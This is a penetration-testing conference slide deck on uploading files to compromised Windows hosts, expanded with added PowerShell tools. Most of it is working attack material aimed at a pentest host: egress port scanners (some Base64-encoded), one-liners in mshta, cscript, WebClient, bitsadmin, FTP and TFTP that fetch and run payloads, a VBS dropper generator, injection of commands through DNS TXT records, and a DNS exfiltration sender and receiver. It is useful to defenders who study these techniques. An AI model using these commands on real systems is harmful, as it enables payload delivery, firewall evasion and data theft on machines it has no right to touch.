Windows File Uploading Out of the Box
[post exploitation]
Vyacheslav Yegoshin
Positive Technologies
PHDAYS III
[whoami]
http://github.com/nxnrt/WindowsUploadToolkit
Vyacheslav Yegoshin
- Penetration tester
- SCADAStrangeLove team member
[Problem]
[OSes] Many Windows versions; .NET 3.5 integrated or not; UAC; etc.
[Utilities and tools]
― FTP
― TFTP
― Telnet
― JScript/VBScript
― Windows Script File
― MSHTA
― Samba
― WebDAV
― PowerShell
― BITSADMIN
― NSLOOKUP
― …
[Egress Firewall Test]
- Check all TCP ports
- Check all UDP ports
[Egress Firewall][Windows XP & 2003]
- Bruteforce all TCP ports on Pentest with telnet
FOR /L %i IN (1,1,65535) DO (cmd /c "start /b telnet 1.2.3.4 %i")
- Bruteforce all UDP ports on Pentest with nslookup (the slide runs both loops over the first 4096 ports)
FOR /L %i IN (1,1,4096) DO (cmd /c "start /b telnet 1.2.3.4 %i")
FOR /L %i IN (1,1,4096) DO (cmd /c "start /b nslookup -port=%i ya.ru 1.2.3.4")
[Egress Firewall][Incoming connection]
- Capture your traffic with TCPdump on the Pentest host (5.5.5.5 is the target's external NAT address)!
tcpdump -n host 5.5.5.5
[Egress Firewall][Windows XP & 2003]
Influence:
~ 400 telnet.exe processes
~ 700 MB RAM is used
~ 30 min TCP scan
~ 30 min UDP scan
[Egress TCP][Windows Vista and Later]
- Bruteforce all TCP ports on Pentest with PowerShell
- Telnet client is not installed by default :( but if we can run with elevated permissions …
dism /online /enable-feature /featurename:TelnetClient
powershell -encodedCommand
ZnVuY3Rpb24gc1QoJElQLCRQb3J0KSB7JEFkZHJlc3MgPSBbc3lzdGVtLm5ldC5JUEFkZHJlc3NdOjpQYXJzZSgkSVApOyRFbmQgPS
BOZXctT2JqZWN0IFN5c3RlbS5OZXQuSVBFbmRQb2ludCAkYWRkcmVzcywgJHBvcnQ7JFNhZGRyZiA9IFtTeXN0ZW0uTmV0LlNvY2t
ldHMuQWRkcmVzc0ZhbWlseV06OkludGVyTmV0d29yazskU3R5cGUgPSBbU3lzdGVtLk5ldC5Tb2NrZXRzLlNvY2tldFR5cGVdOjpTdHJl
YW07JFB0eXBlID0gW1N5c3RlbS5OZXQuU29ja2V0cy5Qcm90b2NvbFR5cGVdOjpUQ1A7JFNvY2sgPSBOZXctT2JqZWN0IFN5c3RlbS
5OZXQuU29ja2V0cy5Tb2NrZXQgJHNhZGRyZiwgJHN0eXBlLCAkcHR5cGU7JFNvY2suVFRMID0gMjY7dHJ5IHsgJHNvY2suQ29ubmVj
dCgkRW5kKTtbQnl0ZVtdXSAkTWVzc2FnZSA9IFtjaGFyW11dIncwMHR3MDB0IjskU2VudCA9ICRTb2NrLlNlbmQoJE1lc3NhZ2UpOyRz
b2NrLkVuZENvbm5lY3QoJENvbm5lY3QpfSBjYXRjaCB7fTskU29jay5DbG9zZSgpO307MS4uNjU1MzUgfCAleyBzVCAtSVAgIjEuMi4zLj
QiIC1Qb3J0ICRfIH0=
[Egress TCP][Windows Vista and Later]
Base64 decode:
function sT($IP,$Port) {
    $Address = [system.net.IPAddress]::Parse($IP)
    $End = New-Object System.Net.IPEndPoint $Address, $Port
    $Saddrf = [System.Net.Sockets.AddressFamily]::InterNetwork
    $Stype = [System.Net.Sockets.SocketType]::Stream
    $Ptype = [System.Net.Sockets.ProtocolType]::TCP
    $Sock = New-Object System.Net.Sockets.Socket $Saddrf, $Stype, $Ptype
    $Sock.TTL = 26
    try {
        $Sock.Connect($End)
        [Byte[]] $Message = [char[]]"w00tw00t"
        $Sent = $Sock.Send($Message)
        # $Connect is never set, so this call throws and the empty catch swallows it;
        # the connect and the w00tw00t marker have already gone out by then
        $Sock.EndConnect($Connect)
    } catch {}
    $Sock.Close()
}
1..65535 | %{ sT -IP "1.2.3.4" -Port $_ };
[Egress UDP][Windows Vista and Later]
- Bruteforce all UDP ports on Pentest with PowerShell
- nslookup "set port" option doesn't work! :(
powershell -encodedCommand
ZnVuY3Rpb24gc1UoJElQLCBbaW50XSRQb3J0KXskQWRkcmVzcyA9IFtzeXN0ZW0ubmV0LklQQWRkcmVzc106OlBhcnNlKCRJUCk7JEVuZCA9IE5l
dy1PYmplY3QgU3lzdGVtLk5ldC5JUEVuZFBvaW50KCRBZGRyZXNzLCAkcG9ydCk7JFNhZGRyZj1bU3lzdGVtLk5ldC5Tb2NrZXRzLkFkZHJlc3NGYW
1pbHldOjpJbnRlck5ldHdvcms7JFN0eXBlPVtTeXN0ZW0uTmV0LlNvY2tldHMuU29ja2V0VHlwZV06OkRncmFtOyRQdHlwZT1bU3lzdGVtLk5ldC5Tb2Nr
ZXRzLlByb3RvY29sVHlwZV06OlVEUDskU29jaz1OZXctT2JqZWN0IFN5c3RlbS5OZXQuU29ja2V0cy5Tb2NrZXQgJHNhZGRyZiwgJHN0eXBlLCAkcH
R5cGU7JFNvY2suVFRMID0gMjY7JHNvY2suQ29ubmVjdCgkZW5kKTskRW5jPVtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OkFTQ0lJOyRNZXNzYWdlI
D0gIncwMHR3MDB0IjskQnVmZmVyPSRFbmMuR2V0Qnl0ZXMoJE1lc3NhZ2UpOyRTZW50PSRTb2NrLlNlbmQoJEJ1ZmZlcik7fTsgMS4uNjU1MzUgf
CAleyBzVSAtSVAgIjEuMi4zLjQiIC1Qb3J0ICRfIH0=
[Egress UDP][Windows Vista and Later]
Base64 decode:
function sU($IP, [int]$Port){
    $Address = [system.net.IPAddress]::Parse($IP)
    $End = New-Object System.Net.IPEndPoint($Address, $Port)
    $Saddrf = [System.Net.Sockets.AddressFamily]::InterNetwork
    $Stype = [System.Net.Sockets.SocketType]::Dgram
    $Ptype = [System.Net.Sockets.ProtocolType]::UDP
    $Sock = New-Object System.Net.Sockets.Socket $Saddrf, $Stype, $Ptype
    $Sock.TTL = 26
    $Sock.Connect($End)
    $Enc = [System.Text.Encoding]::ASCII
    $Message = "w00tw00t"
    $Buffer = $Enc.GetBytes($Message)
    $Sent = $Sock.Send($Buffer)
    $Sock.Close()   # not in the encoded version above; frees the socket instead of leaking 65535 of them
}
1..65535 | %{ sU -IP "1.2.3.4" -Port $_ }
[Egress TCP&UDP][Windows Vista and Later]
Minor Influence:
- 1 powershell.exe process
~ 100 MB RAM is used
~ 40 min TCP scan
~ 40 min UDP scan
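The scanners above are fire-and-forget: the target learns nothing, and tcpdump on the Pentest host is the only record of which ports got out. The following is an added example, not code from the slides or from WindowsUploadToolkit, that records the result on the target as well by starting a batch of asynchronous connects and keeping only the ones that completed a handshake. It assumes 1.2.3.4 is the Pentest host with something listening on every TCP port (for example an iptables REDIRECT of all ports to one nc), so "connected" means "egress allowed"; the function name and parameters are my own.

```powershell
# Added example: egress check that returns the ports that actually connected.
# Assumed: 1.2.3.4 answers on every TCP port; PowerShell 2.0 / .NET 3.5 is enough.
function Test-EgressTcp {
    param(
        [Parameter(Mandatory=$true)][string]$IP,
        [int[]]$Ports = (1..65535),
        [int]$TimeoutMs = 500,   # how long each batch waits for SYN/ACKs
        [int]$BatchSize = 100    # parallel connects per batch
    )
    $allowed = New-Object System.Collections.Generic.List[int]
    for ($i = 0; $i -lt $Ports.Count; $i += $BatchSize) {
        $last  = [Math]::Min($i + $BatchSize, $Ports.Count) - 1
        $batch = @()
        foreach ($port in $Ports[$i..$last]) {
            $client = New-Object System.Net.Sockets.TcpClient
            try {
                # non-blocking connect; we collect the results after the timeout
                $ar = $client.BeginConnect($IP, $port, $null, $null)
                $batch += ,@($port, $client, $ar)
            } catch { $client.Close() }
        }
        Start-Sleep -Milliseconds $TimeoutMs
        foreach ($entry in $batch) {
            $port, $client, $ar = $entry
            if ($ar.IsCompleted) {
                # EndConnect throws on RST / unreachable; only a completed handshake survives
                try { $client.EndConnect($ar); $allowed.Add($port) } catch {}
            }
            $client.Close()   # also abandons connects that are still pending
        }
    }
    return $allowed.ToArray()
}
# Usage on the target:
# Test-EgressTcp -IP 1.2.3.4 -Ports (1..1024) | Out-File egress.txt
```

Two things to keep in mind when running it: Windows XP SP2 through Vista SP1 throttle outbound half-open TCP connections to about ten at a time (event 4226 in the system log), so on those builds a large batch just queues and the scan runs no faster than the telnet loop; and several hundred failed outbound connects per second are exactly what an egress-filtering firewall or host IDS logs, so on an engagement where stealth matters scan the handful of ports you actually intend to use.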
[Telnet]
Any TCP open
Pentest: nc -q 20 -lvp 53 < payload.vbs
Target: mode CON COLS=2000 && telnet -f c:\payload.vbs 1.2.3.4 53
(mode CON COLS=2000 raises the console line width so long lines are not wrapped in the log; -f is the path the session log is saved to)
[Telnet] Only ASCII symbols: HEX is our choice!
(telnet -f writes the session as text, so binaries go over as hex and are decoded on the target, e.g. certutil -decodehex payload.hex payload.exe)
[FTP]
Any TCP open
- Script file must exist
- FTP client built in all Windows versions
Create script file payload.txt:
open 1.2.3.4 3128
quote pasv
binary
get payload.exe c:\payload.exe
bye
Target: ftp -i -s:payload.txt
Pentest: service pure-ftpd start
(Caveat: ftp.exe has no passive mode of its own. quote pasv only sends the PASV command; the data connection is still set up with PORT, i.e. the server connects back to the target, so that inbound connection must be allowed. For real passive FTP use .NET from PowerShell instead.)
[TFTP]
69/UDP open
- Use only UDP protocol
- TFTP client is not installed by default :( but if we can run it with elevated permissions …
dism /online /enable-feature /featurename:TFTP
Target: tftp -i 1.2.3.4 GET payload.exe
Pentest: atftpd --daemon --port 69 /tmp
[Samba]
445/TCP open
+ No writable directory
+ No command output
- Proxy isn't supported
- 445/tcp only
Pentest: service smbd start
Target: net use X: \\1.2.3.4\<share>
Target: start x:\payload.exe
[JScript/VBScript]
Any TCP open
― Encode EXE to script
― Use protocols: SMTP, FTP, LDAP …
― Script file must exist: .js, .jse, .vbs, .vbe
― JScript vs VBScript
― cscript vs wscript
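"Encode EXE to script" means the script carries the binary in text form and rebuilds it with COM objects that exist on every Windows install. The following is an added example, not the slides' or WindowsUploadToolkit's code: a PowerShell function run on the Pentest host that emits a stand-alone .vbs dropper, using the same MSXML bin.base64 trick the WSF slides rely on plus ADODB.Stream to write the bytes. Function name, parameter names and the paths (C:\payload.exe as the file to carry, C:\payload.exe again as the drop location on the target) are assumptions.

```powershell
# Added example: build a .vbs that recreates a binary on the target.
# Assumed paths: -InputFile is the binary on the pentest host, -DropPath where the
# target writes it. Base64 is split into short lines because VBScript dislikes very long ones.
function New-VbsDropper {
    param(
        [Parameter(Mandatory=$true)][string]$InputFile,
        [Parameter(Mandatory=$true)][string]$OutputVbs,
        [string]$DropPath = 'C:\payload.exe',
        [int]$ChunkSize = 64
    )
    $bytes = [System.IO.File]::ReadAllBytes($InputFile)
    $b64   = [Convert]::ToBase64String($bytes)
    $sb    = New-Object System.Text.StringBuilder
    [void]$sb.AppendLine('Dim s : s = ""')
    for ($i = 0; $i -lt $b64.Length; $i += $ChunkSize) {
        $len = [Math]::Min($ChunkSize, $b64.Length - $i)
        [void]$sb.AppendLine('s = s & "' + $b64.Substring($i, $len) + '"')
    }
    # MSXML decodes the Base64 into a byte array; ADODB.Stream writes it to disk
    [void]$sb.AppendLine(@"
Set xml = CreateObject("Msxml2.DOMDocument")
Set node = xml.createElement("b64")
node.DataType = "bin.base64"
node.Text = s
Set stm = CreateObject("ADODB.Stream")
stm.Type = 1 ' adTypeBinary
stm.Open
stm.Write node.nodeTypedValue
stm.SaveToFile "$DropPath", 2 ' adSaveCreateOverWrite
stm.Close
"@)
    [System.IO.File]::WriteAllText($OutputVbs, $sb.ToString(), [System.Text.Encoding]::ASCII)
    # SHA-1 of the original, to compare with the dropped file on the target
    $sha1 = [System.Security.Cryptography.SHA1]::Create()
    return [BitConverter]::ToString($sha1.ComputeHash($bytes)).Replace('-', '')
}
# Usage on the pentest host (paths assumed):
# New-VbsDropper -InputFile C:\payload.exe -OutputVbs C:\out\payload.vbs
```

The output is pure ASCII, so it survives the telnet -f transfer from the previous slides unchanged; on the target, cscript payload.vbs writes the file and certutil -hashfile C:\payload.exe SHA1 (Vista and later) gives the value to compare with what the function returned.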
[JScript/VBScript]
Any TCP open
Pentest: nc -q 20 -lvp 53 < payload.js
Target: telnet -f payload.js 1.2.3.4 53
Target: cscript payload.js
[JScript/VBScript]
Why not in one line? telnet -f payload.js 1.2.3.4 53 & cscript payload.js
(telnet returns once the listener closes the connection and you press any key; cscript then runs the saved script)
[JScript/VBScript]
445/TCP open (SMB share; a WebDAV UNC path does the same on any port, see the WebDAV slides)
Pentest: service smbd start
Target: cscript \\1.2.3.4\payload.js
[Windows Script File]
― XML document
― Script file must exist: .wsf, .wse
― JScript and VBScript
― External scripts
― Encode EXE to WSF
[Windows Script File][Link external script]
Any TCP open
Target: cscript payload.wsf
payload.wsf (any of):
<job><script language="VBScript" src="http://1.2.3.4:80/payload.vbs"></script></job>
<job><script language="VBScript" src="ftp://1.2.3.4:21/payload.vbs"></script></job>
<job><script language="VBScript" src="\\1.2.3.4\payload.vbs"></script></job>
[Windows Script File]
― Any2Bat (zzzEVAzzz)
Flow: p.exe -> make p.cab -> read p.cab and Base64-encode it -> insert into the <cab> element -> convert to BAT: echo … >> payload.wsf
<package>
<cab xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="bin.base64">
(Base64 of p.cab inserted here)
</cab>
<job><script language="VBScript">
…
</script></job></package>
[Windows Script File]
― Any2Bat. Now in PowerShell!
• Make-CabFile -Path
• Convert-Cab2Base64 -CabPath
• Convert-Cab2WSF -CabEncode
• Convert-Cab2Bat -CabEncode
Make-CabFile -Path c:\payload.exe | Convert-Cab2WSF
Make-CabFile -Path c:\payload.exe | Convert-Cab2Bat
[Windows Script File]
DEMO
[MSHTA]
― No browser security zones
― Argument: URL or Script
• JScript
• VBScript
― No UAC
― Parse text on the fly
[MSHTA]
Any TCP open
mshta http(s)://pastebin.com:80/raw.php?i=5W6JtsUu
mshta ftp://1.2.3.4:21/payload.jpg
mshta \\1.2.3.4\payload.js
[MSHTA]
Any TCP open
mshta vbscript:Execute("WScript.Echo 1")
mshta javascript:Execute("WScript.Echo(1);")
(Check: the WScript object is a cscript/wscript host object and does not exist inside mshta, and JScript has no Execute. In practice use MsgBox or CreateObject("WScript.Shell") from VBScript, alert() or new ActiveXObject() from JScript, and end with close() so the hidden HTA window goes away.)
[NSLOOKUP]
no tcp/udp open
― Get DNS Records:
• IP -> Domain name (PTR)
• Domain name -> IP (A and AAAA)
• Get TXT record (TXT)
[NSLOOKUP]
no tcp/udp open
Setup (diagram): TARGET 192.168.1.10 sits behind Firewall/NAT (internal IP 192.168.1.1, external IP 5.5.5.5) and can only talk to the internal primary DNS. PENTEST host 1.2.3.4 is the name server for pentest.com. The internal DNS forwards every query for rce.pentest.com to 1.2.3.4 and relays the response, which gives Remote Command Execution without any direct connection.
Get all TXT records from rce.pentest.com
[NSLOOKUP][Get file]
Name server rce.pentest.com, TXT record:
TXT = 1x" & echo dir "c:\Program Files" >> p.bat & "
Target 192.168.1.10:
nslookup -type=TXT rce.pentest.com > run.bat & run.bat
How it works: nslookup prints each record's text on its own line wrapped in quotes, so run.bat contains "1x" & echo dir "c:\Program Files" >> p.bat & "". The quoted "1x" fails as an unknown command, the echo between the & signs appends one valid command to p.bat (the source file being fetched), and the trailing "" is harmless. One TXT record per line of p.bat.
[NSLOOKUP][Send]
Name server rce.pentest.com, target 192.168.1.10
PoC: FOR /F %I IN ('ipconfig /all') DO nslookup %I.rce.pentest.com
Every word of the command output becomes a subdomain label; read it back from the DNS server log on the Pentest host.
[NSLOOKUP][Send]
mshta "javascript:function h(out){hxd='';for(a=0;a<out.length;a=a+1){hxd=hxd+out.charCodeAt(a).toString(16);}return hxd;}function r(cmd){var shell=new ActiveXObject('WScript.Shell');var se=shell.Exec(cmd);var out='';while(!(se.StdOut.AtEndOfStream)){out=out+se.StdOut.ReadLine();}return out;}function ex(cmd){var out=h(r(cmd));query=out.match(/.{1,60}/g);for(v=0;v<query.length;v=v+1){r('nslookup '+v+'x'+query[v]+'.pentest.com')};}function e(){ex('dir');}window.onload=e"
[NSLOOKUP][Send]
Read command STDOUT (example command: dir), convert it to HEX, split into chunks of at most 60 characters with .match(/.{1,60}/g), and query <index> + "x" + <chunk> + ".pentest.com" for each chunk:
nslookup 0x417070446174614170706c69636174696f6e5c2044617461436f6e746163.pentest.com
nslookup 1x7473436f6f6b6965734465736b746f70446f63756d656e7473446f776e6c.pentest.com
nslookup 2x6f61647344726f70626f784661766f72697465734c696e6b734c6f63616c.pentest.com
Pentest: use auxiliary/server/fakedns (Metasploit) to answer and log the queries
[NSLOOKUP][Send]
no tcp/udp open
Example command sent this way: where powershell
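The mshta one-liner has two rough edges a practitioner runs into at once: charCodeAt(a).toString(16) produces a single hex digit for bytes below 0x10 (a tab in the output breaks the decoding), and nothing bounds the query name to what DNS accepts (63 characters per label, 253 per name). The following is an added example, not the slides' or WindowsUploadToolkit's code, showing the same hex-over-nslookup channel in PowerShell with fixed two-digit hex, a chunk size that respects the label limit, and the receiver side that reassembles what the DNS server logged. pentest.com is assumed to be the Pentest host's authoritative zone; the function names, the "xend" terminator and the sample data are mine.

```powershell
# Added example: hex-over-DNS exfiltration with a matching receiver.
# Assumed zone: pentest.com (authoritative on the pentest host). The target only
# ever talks to its own resolver, exactly as on the slides.
function ConvertTo-HexString([byte[]]$Bytes) {
    ($Bytes | ForEach-Object { $_.ToString('x2') }) -join ''   # always two digits per byte
}
function Send-DnsExfil {
    param(
        [Parameter(Mandatory=$true)][string]$Text,
        [string]$Domain = 'pentest.com',
        [int]$ChunkSize = 60,     # must stay <= 63, the maximum DNS label length
        [switch]$DryRun           # build the names without running nslookup
    )
    $hex   = ConvertTo-HexString ([System.Text.Encoding]::ASCII.GetBytes($Text))
    $names = @()
    $n = 0
    for ($i = 0; $i -lt $hex.Length; $i += $ChunkSize) {
        $len  = [Math]::Min($ChunkSize, $hex.Length - $i)
        $name = '{0}x{1}.{2}' -f $n, $hex.Substring($i, $len), $Domain
        $names += $name
        if (-not $DryRun) { & nslookup.exe $name 2>&1 | Out-Null }
        $n++
    }
    $end = '{0}xend.{1}' -f $n, $Domain   # terminator: tells the receiver the transfer is done
    $names += $end
    if (-not $DryRun) { & nslookup.exe $end 2>&1 | Out-Null }
    return $names
}
function Receive-DnsExfil {
    # $QueryNames: names as they appear in the DNS server log (any order, repeats allowed)
    param([Parameter(Mandatory=$true)][string[]]$QueryNames, [string]$Domain = 'pentest.com')
    $pattern = '^(\d+)x([0-9a-f]+)\.' + [regex]::Escape($Domain) + '\.?$'
    $chunks  = @{}
    foreach ($q in $QueryNames) {
        if ($q -match $pattern) { $chunks[[int]$Matches[1]] = $Matches[2] }   # index -> hex chunk
    }
    $hex   = ($chunks.Keys | Sort-Object | ForEach-Object { $chunks[$_] }) -join ''
    $bytes = New-Object byte[] ($hex.Length / 2)
    for ($i = 0; $i -lt $bytes.Length; $i++) {
        $bytes[$i] = [Convert]::ToByte($hex.Substring(2 * $i, 2), 16)
    }
    return [System.Text.Encoding]::ASCII.GetString($bytes)
}
# Constructed demo (no real DNS traffic): the names the sender would issue for a
# sample string, replayed through the receiver as if they came from the server log.
$log = Send-DnsExfil -Text 'C:\Users\bob\AppData' -DryRun
Receive-DnsExfil -QueryNames $log   # C:\Users\bob\AppData
```

The running index in front of each chunk does double duty: it keeps the order when the log is read back, and it makes every query name unique, so the target's resolver never answers a repeated chunk from cache without forwarding it. Resolvers may also randomise letter case in the question name, which is why the receiver matches case-insensitively (the PowerShell default).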
[NSLOOKUP][Send file]
DEMO
[WebDAV vs. Samba]
WebDAV:
+ Any TCP open
+ Proxy
+ SSL
+ No writable directory
+ No command output
Samba:
+ No writable directory
+ No command output
- Proxy isn't supported
- 445/tcp only
[WebDAV][Windows XP SP3 or KB892211]
Any TCP open
Target (any of):
net use X: http(s)://1.2.3.4/webdav
net use X: \\1.2.3.4\webdav
net use X: \\1.2.3.4@SSL\webdav
net use X: \\1.2.3.4@SSL@5443\webdav
net use X: \\1.2.3.4@53\webdav
Pentest: Apache WebDAV module
(Check: the UNC forms go through the WebClient service; it is present but stopped or disabled by default on Server editions, so sc query WebClient first.)
[PowerShell]
Any TCP open
― C# code
― Any application level protocol
― Encoded commands
― Simple and it works!
[PowerShell]
Any TCP open
Pentest: service apache2 start
Target: (New-Object System.Net.WebClient).DownloadFile("http://1.2.3.4:80/payload.exe", "c:\payload.exe")
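"Any application level protocol" is the real advantage over ftp.exe and bitsadmin, so here is an added example (not the slides' code) of a single download helper that covers the two failure modes the one-liner above does not: a corporate proxy that wants the user's credentials (WebClient picks up the system proxy but sends no credentials to it), and FTP through an egress-only firewall (FtpWebRequest does real passive mode, which ftp.exe cannot). It also checks a SHA-1 so a tampered or truncated download is never executed. The function name, parameters and URLs on 1.2.3.4 are assumptions; it runs on PowerShell 2.0 / .NET 3.5.

```powershell
# Added example: HTTP(S) and passive-FTP download with proxy credentials and a hash check.
# Assumed: http://1.2.3.4/payload.exe or ftp://1.2.3.4/payload.exe is served by the pentest
# host; -ExpectedSha1 is the hash computed there beforehand.
function Get-PayloadFile {
    param(
        [Parameter(Mandatory=$true)][string]$Url,
        [Parameter(Mandatory=$true)][string]$Destination,
        [string]$ExpectedSha1
    )
    $uri = New-Object System.Uri $Url
    if ($uri.Scheme -eq 'ftp') {
        $req = [System.Net.FtpWebRequest]::Create($uri)
        $req.Method      = [System.Net.WebRequestMethods+Ftp]::DownloadFile
        $req.UsePassive  = $true    # data connection is opened by us, never back through the firewall
        $req.UseBinary   = $true
        $req.Credentials = New-Object System.Net.NetworkCredential('anonymous', 'a@b.c')
    } else {
        $req = [System.Net.WebRequest]::Create($uri)
        $req.Proxy = [System.Net.WebRequest]::GetSystemWebProxy()        # IE / WinHTTP proxy settings
        $req.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials   # logged-on user
    }
    $resp = $req.GetResponse()
    $in   = $resp.GetResponseStream()
    $out  = [System.IO.File]::Create($Destination)
    $buf  = New-Object byte[] 65536
    try {
        # manual copy loop: Stream.CopyTo only exists from .NET 4
        while (($n = $in.Read($buf, 0, $buf.Length)) -gt 0) { $out.Write($buf, 0, $n) }
    } finally { $out.Close(); $in.Close(); $resp.Close() }
    $sha1 = [System.Security.Cryptography.SHA1]::Create()
    $fs   = [System.IO.File]::OpenRead($Destination)
    try { $actual = [BitConverter]::ToString($sha1.ComputeHash($fs)).Replace('-', '') }
    finally { $fs.Close() }
    if ($ExpectedSha1 -and $actual -ne $ExpectedSha1) {
        Remove-Item $Destination
        throw "hash mismatch for $Destination : got $actual"
    }
    return $actual
}
# Usage on the target (hash assumed):
# Get-PayloadFile -Url ftp://1.2.3.4/payload.exe -Destination C:\payload.exe -ExpectedSha1 '...'
```

For an https:// listener with a self-signed certificate the request fails validation; the usual fix is to set [System.Net.ServicePointManager]::ServerCertificateValidationCallback before calling the function, which is simplest from PowerShell 3.0 onward where a script block converts cleanly to the delegate.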
[BITSADMIN][Windows 2003 SP1 and later]
Any TCP open
Pentest: service apache2 start
Target: bitsadmin /transfer whatever http://1.2.3.4:80/payload.exe c:\payload.exe
[BITSADMIN][Windows 2003 SP1 and later]
Any TCP open
bitsadmin /CREATE /DOWNLOAD jobname
bitsadmin /ADDFILE jobname http://1.2.3.4/payload1.exe p1.exe
bitsadmin /ADDFILE jobname http://1.2.3.4/payload2.exe p2.exe
…
bitsadmin /RESUME jobname
bitsadmin /COMPLETE jobname
(Checks: use absolute local paths; the files only appear once /COMPLETE runs; BITS follows the user's proxy settings and needs an HTTP server that returns Content-Length and honours Range requests.)
[Special tnx]
—Gleb Gritsai
—Sergey Gordeychik
Questions?
http://github.com/nxnrt/WindowsUploadToolkit
@vegoshin
vegoshin@ptsecurity.com
